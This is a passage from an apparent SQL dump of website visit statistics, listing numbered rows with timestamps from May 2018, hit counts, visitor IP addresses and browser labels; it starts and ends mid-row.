0266,1,1,0,0,'146.185.185.122','chrome'),(246081,1526480505,1,1,0,0,'180.76.15.34','other'),(246082,1526480701,2,2,0,0,'54.36.148.130','other'),(246083,1526480786,1,1,0,0,'54.36.148.199','other'),(246084,1526480936,1,1,0,0,'54.36.148.127','other'),(246085,1526481023,1,1,0,0,'8.29.198.26','other'),(246086,1526481100,2,0,2,0,'66.249.64.30',''),(246087,1526481282,3,3,0,0,'141.8.142.74','other'),(246088,1526481517,1,1,0,0,'54.36.148.250','other'),(246089,1526481565,1,1,0,0,'157.55.39.199','other'),(246090,1526481771,1,1,0,0,'54.36.148.234','other'),(246091,1526481796,1,1,0,0,'216.244.66.237','other'),(246092,1526481987,1,1,0,0,'40.77.167.170','other'),(246093,1526482119,1,0,1,0,'66.249.64.28',''),(246094,1526482582,2,2,0,0,'141.8.142.74','other'),(246095,1526482584,1,1,0,0,'54.36.148.183','other'),(246096,1526482782,1,1,0,0,'37.9.113.182','other'),(246097,1526483057,2,2,0,0,'178.154.171.88','other'),(246098,1526483067,1,1,0,0,'35.226.23.240','other'),(246099,1526483293,1,1,0,0,'54.36.148.137','other'),(246100,1526483425,1,1,0,0,'66.249.70.27','chrome'),(246101,1526483600,1,1,0,0,'54.36.148.213','other'),(246102,1526484148,1,1,0,0,'54.36.148.65','other'),(246103,1526484235,1,1,0,0,'54.36.148.27','other'),(246104,1526484344,1,0,1,0,'66.249.64.29',''),(246105,1526484424,1,0,1,0,'66.249.64.28',''),(246106,1526484714,1,1,0,0,'54.36.148.180','other'),(246107,1526484746,1,1,0,0,'54.36.148.59','other'),(246108,1526484910,1,1,0,0,'54.36.148.154','other'),(246109,1526485334,1,1,0,0,'91.196.178.69','chrome'),(246110,1526485365,1,1,0,0,'54.36.148.223','other'),(246111,1526485382,1,1,0,0,'54.36.149.64','other'),(246112,1526485392,1,1,0,0,'54.36.148.182','other'),(246113,1526485480,1,1,0,0,'54.36.149.33','other'),(246114,1526485500,1,1,0,0,'54.36.149.91','other'),(246115,1526485532,1,1,0,0,'54.36.149.58','other'),(246116,1526485713,1,1,0,0,'54.36.148.18','other'),(246117,1526485885,1,1,0,0,'54.36.148.76','other'),(246118,1526486024,1,1,0,0,'54.36.149.74','other'),(246119,1526486108,1,1,0,0,'54.36.148.143','other'),(246120,1526486510,1,1,0,0,'54.36.149.8','other'),(246121,1526486686,1,1,0,0,'54.36.148.205','other'),(246122,1526486807,6,6,0,0,'46.70.253.201','other'),(246123,1526486912,1,1,0,0,'8.29.198.25','other'),(246124,1526486924,1,1,0,0,'141.8.142.74','other'),(246125,1526486968,1,1,0,0,'176.36.98.95','chrome'),(246126,1526487051,1,1,0,0,'54.36.148.71','other'),(246127,1526487536,1,1,0,0,'54.36.148.116','other'),(246128,1526487891,1,1,0,0,'54.36.149.58','other'),(246129,1526488158,3,3,0,0,'141.8.142.74','other'),(246130,1526488263,1,1,0,0,'54.36.149.55','other'),(246131,1526488292,1,1,0,0,'91.196.178.92','firefox'),(246132,1526489262,1,1,0,0,'54.36.148.182','other'),(246133,1526489373,1,1,0,0,'54.36.148.184','other'),(246134,1526489505,3,3,0,0,'94.130.187.202','other'),(246135,1526489654,1,1,0,0,'141.8.142.74','other'),(246136,1526490017,1,1,0,0,'54.36.149.72','other'),(246137,1526490050,1,1,0,0,'54.36.148.127','other'),(246138,1526490315,1,1,0,0,'62.210.103.36','other'),(246139,1526490813,1,1,0,0,'54.36.148.62','other'),(246140,1526490881,1,1,0,0,'54.36.148.218','other'),(246141,1526490920,1,1,0,0,'54.36.148.70','other'),(246142,1526490978,1,1,0,0,'54.36.148.248','other'),(246143,1526490997,4,4,0,0,'141.8.142.74','other'),(246144,1526491008,1,1,0,0,'178.154.171.88','other'),(246145,1526491106,5,5,0,0,'159.224.216.6','other'),(246146,1526491269,2,2,0,0,'159.224.216.6','chrome'),(246147,1526491438,1,1,0,0,'54.36.148.47','other'),(246148,1526491459,1,1,0,0,'54.36.149.87','other'),(246149,1526491703,1,0,1,0,'66.249.70.29',''),(246150,1526491856,1,1,0,0,'8.29.198.26','other'),(246151,1526491902,1,0,1,0,'66.249.64.29',''),(246152,1526491961,1,1,0,0,'54.36.149.84','other'),(246153,1526491981,1,1,0,0,'54.36.148.152','other'),(246154,1526492093,1,1,0,0,'54.36.149.17','other'),(246155,1526492321,1,0,1,0,'66.249.64.28',''),(246156,1526492475,1,1,0,0,'54.36.148.198','other'),(246157,1526492509,1,1,0,0,'54.36.149.104','other'),(246158,1526492699,1,1,0,0,'54.36.148.217','other'),(246159,1526492717,1,1,0,0,'46.161.9.39','firefox'),(246160,1526492753,1,1,0,0,'54.36.149.45','other'),(246161,1526492861,1,1,0,0,'54.36.148.221','other'),(246162,1526493042,1,1,0,0,'54.36.148.13','other'),(246163,1526493318,1,1,0,0,'54.36.148.33','other'),(246164,1526493450,1,1,0,0,'216.244.66.237','other'),(246165,1526493745,1,0,1,0,'66.249.64.30',''),(246166,1526493748,1,1,0,0,'141.8.142.74','other'),(246167,1526493783,1,1,0,0,'193.106.30.99','firefox'),(246168,1526493801,1,1,0,0,'54.36.148.245','other'),(246169,1526494131,1,1,0,0,'54.36.148.115','other'),(246170,1526494190,1,1,0,0,'54.36.148.168','other'),(246171,1526494443,1,1,0,0,'54.36.148.94','other'),(246172,1526494590,1,1,0,0,'80.252.155.198','chrome'),(246173,1526494694,1,1,0,0,'178.154.171.88','other'),(246174,1526494993,1,1,0,0,'91.204.132.15','chrome'),(246175,1526495251,1,1,0,0,'157.55.39.197','other'),(246176,1526495456,1,1,0,0,'54.36.148.132','other'),(246177,1526495457,1,0,1,0,'66.249.64.29',''),(246178,1526495473,2,0,2,0,'66.249.64.30',''),(246179,1526495616,1,1,0,0,'141.8.142.74','other'),(246180,1526495665,1,1,0,0,'54.36.148.112','other'),(246181,1526495730,1,1,0,0,'54.36.148.45','other'),(246182,1526495931,1,1,0,0,'54.36.149.90','other'),(246183,1526496022,1,1,0,0,'54.36.149.103','other'),(246184,1526496075,1,0,1,0,'66.249.64.28',''),(246185,1526496225,1,1,0,0,'54.36.149.57','other'),(246186,1526496324,1,1,0,0,'91.196.178.93','chrome'),(246187,1526496331,1,1,0,0,'54.36.149.40','other'),(246188,1526496617,1,1,0,0,'54.36.149.97','other'),(246189,1526496772,1,1,0,0,'54.36.148.102','other'),(246190,1526496973,1,1,0,0,'54.36.149.32','other'),(246191,1526497228,2,2,0,0,'91.196.178.164','chrome'),(246192,1526497588,1,1,0,0,'54.36.149.36','other'),(246193,1526497593,1,1,0,0,'54.36.148.36','other'),(246194,1526497595,1,1,0,0,'54.36.148.213','other'),(246195,1526497607,1,1,0,0,'54.36.148.221','other'),(246196,1526497673,1,1,0,0,'54.36.148.137','other'),(246197,1526497717,1,1,0,0,'54.36.149.90','other'),(246198,1526497745,1,1,0,0,'8.29.198.25','other'),(246199,1526497833,1,1,0,0,'54.36.148.230','other'),(246200,1526497958,1,0,1,0,'66.249.64.28',''),(246201,1526497991,1,1,0,0,'54.36.148.88','other'),(246202,1526498210,3,3,0,0,'141.8.142.74','other'),(246203,1526498628,1,0,1,0,'66.249.70.29',''),(246204,1526498642,1,1,0,0,'54.36.149.13','other'),(246205,1526498690,1,1,0,0,'178.154.171.88','other'),(246206,1526499051,1,1,0,0,'54.36.149.68','other'),(246207,1526499065,1,1,0,0,'157.55.39.199','other'),(246208,1526499186,1,0,1,0,'66.249.64.30',''),(246209,1526499191,2,2,0,0,'141.8.142.74','other'),(246210,1526499281,1,1,0,0,'54.36.148.117','other'),(246211,1526499392,1,1,0,0,'54.36.148.37','other'),(246212,1526499762,1,1,0,0,'54.36.148.190','other'),(246213,1526500004,1,1,0,0,'54.36.148.148','other'),(246214,1526500390,1,0,1,0,'66.249.64.29',''),(246215,1526500393,1,1,0,0,'54.36.149.100','other'),(246216,1526500692,1,1,0,0,'54.224.108.85','other'),(246217,1526500887,1,1,0,0,'91.209.11.174','chrome'),(246218,1526501012,1,1,0,0,'95.132.48.142','chrome'),(246219,1526501081,1,1,0,0,'54.36.149.75','other'),(246220,1526501107,1,1,0,0,'54.36.148.115','other'),(246221,1526501114,1,1,0,0,'91.124.53.98','firefox'),(246222,1526501128,1,1,0,0,'54.36.148.82','other'),(246223,1526501461,1,1,0,0,'157.55.39.199','other'),(246224,1526501565,1,1,0,0,'54.36.148.13','other'),(246225,1526501626,1,1,0,0,'54.36.148.227','other'),(246226,1526501793,2,0,2,0,'66.249.64.28',''),(246227,1526501987,1,1,0,0,'54.36.148.37','other'),(246228,1526502130,1,1,0,0,'54.36.148.111','other'),(246229,1526502233,1,1,0,0,'54.36.148.200','other'),(246230,1526502293,3,3,0,0,'178.154.171.88','other'),(246231,1526502475,1,1,0,0,'54.36.148.206','other'),(246232,1526502594,1,0,1,0,'66.249.64.30',''),(246233,1526502654,1,1,0,0,'180.76.15.26','other'),(246234,1526502666,1,1,0,0,'54.36.148.198','other'),(246235,1526502694,1,1,0,0,'8.29.198.26','other'),(246236,1526502880,1,0,1,0,'66.249.64.29',''),(246237,1526503021,1,1,0,0,'54.36.149.82','other'),(246238,1526503256,1,1,0,0,'54.36.148.248','other'),(246239,1526503262,1,1,0,0,'54.36.149.58','other'),(246240,1526503364,1,1,0,0,'178.154.171.88','other'),(246241,1526503665,1,1,0,0,'54.36.149.8','other'),(246242,1526503902,1,1,0,0,'54.36.148.87','other'),(246243,1526504035,1,1,0,0,'54.36.149.39','other'),(246244,1526504050,1,1,0,0,'54.36.148.179','other'),(246245,1526504095,1,1,0,0,'54.36.148.198','other'),(246246,1526504143,1,1,0,0,'54.36.148.144','other'),(246247,1526504785,1,1,0,0,'54.36.148.53','other'),(246248,1526504838,1,0,1,0,'66.249.70.29',''),(246249,1526505010,1,1,0,0,'54.36.148.106','other'),(246250,1526505090,1,1,0,0,'54.36.149.69','other'),(246251,1526505268,1,1,0,0,'54.36.148.93','other'),(246252,1526505306,1,1,0,0,'87.250.224.46','other'),(246253,1526505368,1,1,0,0,'54.36.149.52','other'),(246254,1526505388,1,1,0,0,'54.36.149.47','other'),(246255,1526505606,1,1,0,0,'54.36.148.55','other'),(246256,1526505705,2,2,0,0,'54.36.149.13','other'),(246257,1526505776,1,0,1,0,'66.249.70.25',''),(246258,1526505908,1,1,0,0,'54.36.149.70','other'),(246259,1526505915,1,1,0,0,'54.36.148.105','other'),(246260,1526506364,1,1,0,0,'54.36.148.131','other'),(246261,1526506487,1,1,0,0,'54.36.148.19','other'),(246262,1526506654,1,1,0,0,'141.8.142.74','other'),(246263,1526507065,25,25,0,0,'149.56.142.185','other'),(246264,1526507125,1,1,0,0,'216.244.66.237','other'),(246265,1526507189,1,1,0,0,'54.36.148.183','other'),(246266,1526507377,2,2,0,0,'95.216.7.31','other'),(246267,1526507653,1,1,0,0,'54.36.148.35','other'),(246268,1526507731,1,1,0,0,'54.36.149.103','other'),(246269,1526507914,1,1,0,0,'54.36.148.213','other'),(246270,1526508102,1,1,0,0,'54.36.148.206','other'),(246271,1526508352,1,1,0,0,'217.69.133.4','other'),(246272,1526508567,1,1,0,0,'8.29.198.26','other'),(246273,1526508725,1,1,0,0,'35.226.23.240','other'),(246274,1526508894,1,1,0,0,'54.36.148.240','other'),(246275,1526508916,1,1,0,0,'54.36.148.242','other'),(246276,1526509305,1,1,0,0,'54.36.148.184','other'),(246277,1526509636,1,1,0,0,'54.36.148.136','other'),(246278,1526509684,1,1,0,0,'54.36.149.90','other'),(246279,1526509895,1,1,0,0,'54.36.148.21','other'),(246280,1526509943,1,1,0,0,'54.36.149.35','other'),(246281,1526510114,1,1,0,0,'46.98.48.146','firefox'),(246282,1526510132,1,1,0,0,'207.46.13.227','other'),(246283,1526510249,1,1,0,0,'178.154.171.88','other'),(246284,1526510521,1,1,0,0,'54.36.148.189','other'),(246285,1526510725,1,1,0,0,'54.36.148.95','other'),(246286,1526510941,3,3,0,0,'95.216.19.28','other'),(246287,1526511266,1,1,0,0,'216.244.66.237','other'),(246288,1526511491,1,1,0,0,'87.250.224.46','other'),(246289,1526511546,1,1,0,0,'54.36.149.2','other'),(246290,1526511805,1,0,1,0,'66.249.64.28',''),(246291,1526512220,2,1,1,0,'66.249.64.30',''),(246292,1526512785,1,1,0,0,'90.154.64.78','msie'),(246293,1526513144,1,1,0,0,'54.36.148.56','other'),(246294,1526513146,1,0,1,0,'66.249.64.28',''),(246295,1526513329,2,2,0,0,'141.8.142.74','other'),(246296,1526513464,1,1,0,0,'54.36.148.209','other'),(246297,1526513525,1,1,0,0,'8.29.198.26','other'),(246298,1526513671,1,1,0,0,'54.36.149.87','other'),(246299,1526513742,1,1,0,0,'54.36.148.27','other'),(246300,1526514091,1,1,0,0,'54.36.149.78','other'),(246301,1526514098,1,1,0,0,'54.36.148.144','other'),(246302,1526514121,1,1,0,0,'54.36.148.108','other'),(246303,1526514477,1,1,0,0,'54.36.148.165','other'),(246304,1526514664,1,1,0,0,'54.36.149.16','other'),(246305,1526515375,1,1,0,0,'91.196.178.18','chrome'),(246306,1526515428,1,1,0,0,'54.36.148.137','other'),(246307,1526515520,1,1,0,0,'54.36.149.47','other'),(246308,1526516101,1,1,0,0,'54.36.148.167','other'),(246309,1526516216,1,1,0,0,'54.36.148.104','other'),(246310,1526516228,1,1,0,0,'54.36.149.52','other'),(246311,1526516322,1,0,1,0,'66.249.64.30',''),(246312,1526516387,1,1,0,0,'54.36.149.66','other'),(246313,1526516514,1,1,0,0,'54.36.149.32','other'),(246314,1526516530,1,1,0,0,'87.250.224.46','other'),(246315,1526517129,1,1,0,0,'54.36.148.57','other'),(246316,1526517160,2,2,0,0,'141.8.142.74','other'),(246317,1526517301,1,1,0,0,'54.36.148.182','other'),(246318,1526517491,1,0,1,0,'66.249.70.25',''),(246319,1526517663,1,1,0,0,'54.36.148.221','other'),(246320,1526517914,1,1,0,0,'54.36.148.109','other'),(246321,1526518345,1,1,0,0,'54.36.149.61','other'),(246322,1526518381,1,1,0,0,'54.36.148.242','other'),(246323,1526518603,1,1,0,0,'54.36.149.95','other'),(246324,1526518802,1,1,0,0,'54.36.148.25','other'),(246325,1526519074,1,1,0,0,'54.36.148.220','other'),(246326,1526519101,1,1,0,0,'54.36.149.0','other'),(246327,1526519140,1,1,0,0,'216.244.66.237','other'),(246328,1526519395,1,1,0,0,'8.29.198.27','other'),(246329,1526519469,1,0,1,0,'66.249.64.30',''),(246330,1526520022,1,1,0,0,'54.36.149.4','other'),(246331,1526520074,1,1,0,0,'54.36.148.58','other'),(246332,1526520079,1,1,0,0,'141.8.142.74','other'),(246333,1526520291,1,0,1,0,'66.249.64.28',''),(246334,1526520491,1,1,0,0,'54.36.149.100','other'),(246335,1526520700,1,1,0,0,'54.36.149.63','other'),(246336,1526520744,1,1,0,0,'157.55.39.197','other'),(246337,1526520934,1,1,0,0,'54.36.148.252','other'),(246338,1526521077,3,3,0,0,'141.8.142.74','other'),(246339,1526521136,1,1,0,0,'54.36.148.250','other'),(246340,1526521244,1,1,0,0,'180.76.15.163','other'),(246341,1526521606,1,1,0,0,'54.36.149.30','other'),(246342,1526521797,1,1,0,0,'54.36.148.61','other'),(246343,1526521887,1,1,0,0,'207.46.13.227','other'),(246344,1526521920,1,1,0,0,'54.36.148.26','other'),(246345,1526522008,1,1,0,0,'54.36.148.59','other'),(246346,1526522017,1,1,0,0,'54.36.149.107','other'),(246347,1526522019,1,0,1,0,'66.249.64.28',''),(246348,1526522122,1,1,0,0,'54.36.148.95','other'),(246349,1526522124,1,1,0,0,'54.36.148.255','other'),(246350,1526522200,1,1,0,0,'54.36.148.90','other'),(246351,1526522428,1,1,0,0,'54.36.148.151','other'),(246352,1526522855,2,0,2,0,'66.249.64.30',''),(246353,1526523309,1,1,0,0,'54.36.148.27','other'),(246354,1526523391,1,1,0,0,'216.244.66.237','other'),(246355,1526523622,2,2,0,0,'141.8.142.74','other'),(246356,1526523939,1,1,0,0,'54.36.148.180','other'),(246357,1526523955,1,1,0,0,'54.36.148.186','other'),(246358,1526524214,1,1,0,0,'54.36.148.246','other'),(246359,1526524218,1,1,0,0,'91.209.11.236','other'),(246360,1526524354,1,1,0,0,'8.29.198.26','other'),(246361,1526524415,1,1,0,0,'207.46.13.227','other'),(246362,1526524691,1,1,0,0,'54.36.149.12','other'),(246363,1526524790,1,1,0,0,'37.9.113.182','other'),(246364,1526524883,1,1,0,0,'54.36.149.56','other'),(246365,1526524989,1,1,0,0,'54.36.149.79','other'),(246366,1526525199,1,1,0,0,'66.249.70.29','chrome'),(246367,1526525529,1,1,0,0,'54.36.148.250','other'),(246368,1526525654,1,0,1,0,'66.249.70.27',''),(246369,1526525903,1,1,0,0,'54.36.148.143','other'),(246370,1526525929,1,1,0,0,'54.36.149.43','other'),(246371,1526525994,1,1,0,0,'217.69.133.2','other'),(246372,1526525998,1,1,0,0,'217.69.133.203','other'),(246373,1526526035,1,0,1,0,'66.249.64.28',''),(246374,1526526135,1,1,0,0,'54.36.148.63','other'),(246375,1526526454,1,0,1,0,'66.249.64.29',''),(246376,1526526477,1,1,0,0,'54.36.148.149','other'),(246377,1526526718,1,1,0,0,'46.161.9.39','firefox'),(246378,1526526879,1,1,0,0,'54.36.148.134','other'),(246379,1526527183,1,1,0,0,'54.36.148.13','other'),(246380,1526527635,1,1,0,0,'54.36.148.54','other'),(246381,1526527667,1,1,0,0,'178.154.171.88','other'),(246382,1526527887,1,0,1,0,'66.249.64.29',''),(246383,1526527941,1,1,0,0,'54.36.148.219','other'),(246384,1526528025,1,1,0,0,'54.36.149.27','other'),(246385,1526528083,1,1,0,0,'54.36.149.85','other'),(246386,1526528124,1,1,0,0,'54.36.149.71','other'),(246387,1526528226,1,1,0,0,'217.69.133.9','other'),(246388,1526528301,1,1,0,0,'54.36.149.39','other'),(246389,1526528549,1,1,0,0,'54.36.148.251','other'),(246390,1526528584,1,1,0,0,'54.36.149.42','other'),(246391,1526528623,1,1,0,0,'141.8.142.74','other'),(246392,1526528834,1,1,0,0,'92.113.13.97','chrome'),(246393,1526528969,1,1,0,0,'54.36.149.31','other'),(246394,1526529105,1,1,0,0,'178.154.171.88','other'),(246395,1526529152,1,1,0,0,'54.36.148.46','other'),(246396,1526529334,1,1,0,0,'54.36.148.165','other'),(246397,1526529707,1,0,1,0,'66.249.64.30',''),(246398,1526529714,1,1,0,0,'54.36.149.68','other'),(246399,1526529885,1,1,0,0,'54.36.149.2','other'),(246400,1526529886,1,1,0,0,'54.36.149.91','other'),(246401,1526529946,1,0,1,0,'66.249.64.28',''),(246402,1526530129,1,1,0,0,'54.36.149.30','other'),(246403,1526530225,1,1,0,0,'8.29.198.26','other'),(246404,1526530261,1,1,0,0,'54.36.149.85','other'),(246405,1526530755,1,1,0,0,'54.36.148.227','other'),(246406,1526530800,1,1,0,0,'54.36.149.72','other'),(246407,1526530864,1,1,0,0,'54.36.148.152','other'),(246408,1526530919,1,1,0,0,'54.36.149.44','other'),(246409,1526530945,1,1,0,0,'54.36.149.88','other'),(246410,1526530990,1,0,1,0,'66.249.70.29',''),(246411,1526531187,1,1,0,0,'54.36.148.232','other'),(246412,1526531366,1,1,0,0,'141.8.142.74','other'),(246413,1526531370,1,1,0,0,'95.216.21.104','other'),(246414,1526531372,1,1,0,0,'54.36.148.194','other'),(246415,1526531526,1,1,0,0,'54.36.148.198','other'),(246416,1526531756,2,0,2,0,'66.249.64.29',''),(246417,1526531848,1,1,0,0,'54.36.148.102','other'),(246418,1526532396,1,0,1,0,'66.249.64.30',''),(246419,1526532469,1,1,0,0,'54.36.149.59','other'),(246420,1526532536,1,1,0,0,'54.36.148.189','other'),(246421,1526532897,1,1,0,0,'54.36.149.32','other'),(246422,1526532970,2,2,0,0,'141.8.142.74','other'),(246423,1526533096,1,1,0,0,'54.36.149.63','other'),(246424,1526533305,1,1,0,0,'54.36.149.105','other'),(246425,1526533364,1,1,0,0,'54.36.149.107','other'),(246426,1526533423,1,1,0,0,'54.36.148.191','other'),(246427,1526533497,1,0,1,0,'66.249.64.28',''),(246428,1526534148,1,1,0,0,'54.36.148.154','other'),(246429,1526534218,1,1,0,0,'54.36.148.206','other'),(246430,1526534223,1,1,0,0,'54.36.148.178','other'),(246431,1526534350,1,1,0,0,'54.36.148.235','other'),(246432,1526534504,1,1,0,0,'54.36.149.84','other'),(246433,1526534506,2,2,0,0,'130.180.217.237','chrome'),(246434,1526534597,1,1,0,0,'54.36.148.88','other'),(246435,1526534604,2,0,2,0,'66.249.64.28',''),(246436,1526535090,1,1,0,0,'54.36.148.20','other'),(246437,1526535121,7,7,0,0,'46.4.54.153','other'),(246438,1526535187,1,1,0,0,'54.36.148.85','other'),(246439,1526535195,1,1,0,0,'8.29.198.26','other'),(246440,1526535224,1,1,0,0,'54.36.149.6','other'),(246441,1526535382,1,1,0,0,'54.36.149.34','other'),(246442,1526535470,1,1,0,0,'54.36.149.83','other'),(246443,1526535621,1,1,0,0,'54.36.149.13','other'),(246444,1526536004,1,0,1,0,'66.249.64.30',''),(246445,1526536028,2,2,0,0,'141.8.142.74','other'),(246446,1526536111,1,1,0,0,'91.236.184.19','chrome'),(246447,1526536135,1,1,0,0,'54.36.148.62','other'),(246448,1526536229,1,1,0,0,'217.69.133.203','other'),(246449,1526536433,2,0,2,0,'66.249.64.28',''),(246450,1526536459,2,0,2,0,'66.249.64.29',''),(246451,1526536540,1,1,0,0,'66.249.64.30','chrome'),(246452,1526536701,1,1,0,0,'91.196.178.135','chrome'),(246453,1526536918,1,1,0,0,'54.36.149.97','other'),(246454,1526537202,1,1,0,0,'54.36.148.70','other'),(246455,1526537485,1,1,0,0,'54.36.148.72','other'),(246456,1526537529,5,0,5,0,'66.249.64.30',''),(246457,1526537599,1,0,1,0,'66.249.64.29',''),(246458,1526537672,3,3,0,0,'91.196.178.94','chrome'),(246459,1526537709,1,0,1,0,'66.249.70.25',''),(246460,1526537772,1,1,0,0,'54.36.148.123','other'),(246461,1526537776,1,1,0,0,'66.249.70.29','chrome'),(246462,1526537807,1,1,0,0,'95.132.32.132','firefox'),(246463,1526537902,1,1,0,0,'54.36.148.198','other'),(246464,1526538041,1,1,0,0,'54.36.148.27','other'),(246465,1526538441,1,0,1,0,'66.249.64.28',''),(246466,1526538507,1,1,0,0,'91.209.11.236','other'),(246467,1526538583,1,1,0,0,'54.36.148.195','other'),(246468,1526539266,1,1,0,0,'91.241.186.68','chrome'),(246469,1526539361,1,1,0,0,'54.36.149.7','other'),(246470,1526539571,1,1,0,0,'54.36.148.230','other'),(246471,1526539603,2,2,0,0,'91.196.178.169','chrome'),(246472,1526539690,1,1,0,0,'54.36.149.3','other'),(246473,1526539822,1,1,0,0,'54.36.148.77','other'),(246474,1526539882,1,1,0,0,'91.204.132.15','chrome'),(246475,1526540099,1,1,0,0,'54.36.149.61','other'),(246476,1526540430,1,1,0,0,'54.36.148.119','other'),(246477,1526540520,1,1,0,0,'54.36.148.236','other'),(246478,1526540659,1,1,0,0,'54.36.148.43','other'),(246479,1526540781,2,2,0,0,'95.216.9.145','other'),(246480,1526540866,1,1,0,0,'91.204.132.15','chrome'),(246481,1526541029,1,1,0,0,'94.153.229.229','other'),(246482,1526541051,1,1,0,0,'8.29.198.25','other'),(246483,1526541054,1,1,0,0,'178.154.171.88','other'),(246484,1526541067,1,1,0,0,'46.161.9.39','chrome'),(246485,1526541343,1,1,0,0,'141.8.142.74','other'),(246486,1526541580,1,1,0,0,'95.132.64.88','firefox'),(246487,1526541599,2,2,0,0,'216.244.66.237','other'),(246488,1526541864,1,1,0,0,'37.25.120.29','firefox'),(246489,1526541962,1,1,0,0,'95.135.36.214','chrome'),(246490,1526542287,1,1,0,0,'54.36.148.33','other'),(246491,1526542645,1,1,0,0,'54.36.148.152','other'),(246492,1526542906,1,1,0,0,'54.36.148.167','other'),(246493,1526542947,1,1,0,0,'54.36.149.33','other'),(246494,1526543126,1,1,0,0,'54.36.148.67','other'),(246495,1526543161,1,1,0,0,'91.124.143.72','chrome'),(246496,1526543273,1,1,0,0,'54.36.149.57','other'),(246497,1526543319,1,1,0,0,'95.135.36.214','chrome'),(246498,1526543327,1,0,1,0,'66.249.64.30',''),(246499,1526543595,1,1,0,0,'91.196.178.134','firefox'),(246500,1526544010,1,1,0,0,'35.226.23.240','other'),(246501,1526544134,2,2,0,0,'91.196.178.94','chrome'),(246502,1526544207,1,0,1,0,'66.249.64.28',''),(246503,1526544281,1,1,0,0,'54.36.148.158','other'),(246504,1526544527,1,0,1,0,'66.249.64.30',''),(246505,1526544615,1,1,0,0,'54.36.149.4','other'),(246506,1526544793,1,1,0,0,'54.36.148.239','other'),(246507,1526544950,1,1,0,0,'141.8.142.74','other'),(246508,1526545066,1,1,0,0,'178.94.222.70','chrome'),(246509,1526545071,1,1,0,0,'178.154.171.88','other'),(246510,1526545271,1,1,0,0,'54.36.148.179','other'),(246511,1526545381,2,0,2,0,'66.249.64.28',''),(246512,1526545385,1,0,1,0,'66.249.70.29',''),(246513,1526545394,1,1,0,0,'66.249.70.27','chrome'),(246514,1526545555,1,1,0,0,'54.36.149.84','other'),(246515,1526545707,1,1,0,0,'40.77.167.62','other'),(246516,1526545798,1,1,0,0,'94.178.227.7','chrome'),(246517,1526545980,1,1,0,0,'54.36.149.72','other'),(246518,1526546030,1,1,0,0,'8.29.198.27','other'),(246519,1526546073,1,1,0,0,'216.244.66.237','other'),(246520,1526546228,1,1,0,0,'207.46.13.164','other'),(246521,1526546358,1,1,0,0,'54.36.149.16','other'),(246522,1526546404,1,1,0,0,'54.36.149.97','other'),(246523,1526546429,2,2,0,0,'91.196.178.16','chrome'),(246524,1526546448,1,1,0,0,'54.36.148.255','other'),(246525,1526546485,1,1,0,0,'54.36.149.89','other'),(246526,1526546634,1,1,0,0,'54.36.149.23','other'),(246527,1526546751,2,2,0,0,'91.196.178.89','chrome'),(246528,1526546909,1,1,0,0,'54.36.149.11','other'),(246529,1526546979,2,2,0,0,'91.196.178.66','chrome'),(246530,1526547108,2,2,0,0,'141.8.142.74','other'),(246531,1526547358,1,1,0,0,'54.36.149.18','other'),(246532,1526547411,1,1,0,0,'54.36.148.52','other'),(246533,1526547580,1,1,0,0,'91.196.178.102','chrome'),(246534,1526547776,2,2,0,0,'91.196.178.94','chrome'),(246535,1526547865,1,1,0,0,'54.36.149.98','other'),(246536,1526547939,2,2,0,0,'91.196.178.16','chrome'),(246537,1526547958,1,1,0,0,'54.36.149.76','other'),(246538,1526548069,1,1,0,0,'178.94.246.91','chrome'),(246539,1526548080,2,2,0,0,'91.196.178.89','chrome'),(246540,1526548096,2,2,0,0,'95.134.171.198','chrome'),(246541,1526548132,1,1,0,0,'54.36.148.158','other'),(246542,1526548362,1,1,0,0,'178.154.200.41','other'),(246543,1526548641,1,1,0,0,'141.8.142.74','other'),(246544,1526548810,1,1,0,0,'91.196.177.46','chrome'),(246545,1526548919,1,1,0,0,'54.36.148.115','other'),(246546,1526548931,1,1,0,0,'54.36.148.81','other'),(246547,1526549119,1,1,0,0,'54.36.148.134','other'),(246548,1526549451,1,1,0,0,'54.36.148.224','other'),(246549,1526549947,1,1,0,0,'54.36.148.76','other'),(246550,1526549992,1,1,0,0,'141.8.142.74','other'),(246551,1526550000,2,2,0,0,'91.196.178.28','chrome'),(246552,1526550066,1,1,0,0,'54.36.148.140','other'),(246553,1526550174,1,1,0,0,'54.36.149.32','other'),(246554,1526550192,1,1,0,0,'216.244.66.237','other'),(246555,1526550303,2,2,0,0,'91.196.178.94','chrome'),(246556,1526550617,1,1,0,0,'178.92.159.209','chrome'),(246557,1526550707,1,1,0,0,'54.36.148.123','other'),(246558,1526550824,1,1,0,0,'217.65.253.175','chrome'),(246559,1526550864,2,2,0,0,'91.196.178.66','chrome'),(246560,1526551063,1,1,0,0,'54.36.148.209','other'),(246561,1526551189,1,1,0,0,'193.106.30.99','firefox'),(246562,1526551202,1,1,0,0,'54.36.148.196','other'),(246563,1526551206,1,1,0,0,'216.244.66.237','other'),(246564,1526551309,1,1,0,0,'54.36.148.90','other'),(246565,1526551336,1,0,1,0,'66.249.64.30',''),(246566,1526551393,1,1,0,0,'54.36.148.154','other'),(246567,1526551428,1,1,0,0,'217.69.133.4','other'),(246568,1526551878,1,1,0,0,'8.29.198.25','other'),(246569,1526551989,2,2,0,0,'141.8.142.74','other'),(246570,1526552283,1,1,0,0,'54.36.148.101','other'),(246571,1526552314,1,1,0,0,'54.36.148.83','other'),(246572,1526552577,1,1,0,0,'54.36.148.70','other'),(246573,1526552637,1,1,0,0,'54.36.148.104','other'),(246574,1526552685,4,4,0,0,'95.216.2.81','other'),(246575,1526552894,2,0,2,0,'66.249.64.30',''),(246576,1526553108,1,1,0,0,'54.36.148.232','other'),(246577,1526553837,1,1,0,0,'178.154.171.88','other'),(246578,1526554009,1,1,0,0,'54.36.148.216','other'),(246579,1526554198,1,1,0,0,'54.36.149.67','other'),(246580,1526554225,1,1,0,0,'54.36.148.202','other'),(246581,1526554268,1,1,0,0,'80.252.154.233','chrome'),(246582,1526554319,1,0,1,0,'66.249.64.29',''),(246583,1526554515,1,1,0,0,'54.36.148.178','other'),(246584,1526554593,1,1,0,0,'54.36.148.182','other'),(246585,1526554649,1,1,0,0,'141.8.142.74','other'),(246586,1526554863,1,1,0,0,'54.36.149.74','other'),(246587,1526555148,1,1,0,0,'54.36.149.23','other'),(246588,1526555248,2,0,2,0,'66.249.64.28',''),(246589,1526555254,1,1,0,0,'54.36.149.61','other'),(246590,1526555460,2,2,0,0,'91.196.178.94','chrome'),(246591,1526555564,1,1,0,0,'217.69.133.5','other'),(246592,1526555776,1,1,0,0,'54.36.148.180','other'),(246593,1526555785,1,1,0,0,'54.36.148.10','other'),(246594,1526555832,1,1,0,0,'87.250.224.46','other'),(246595,152655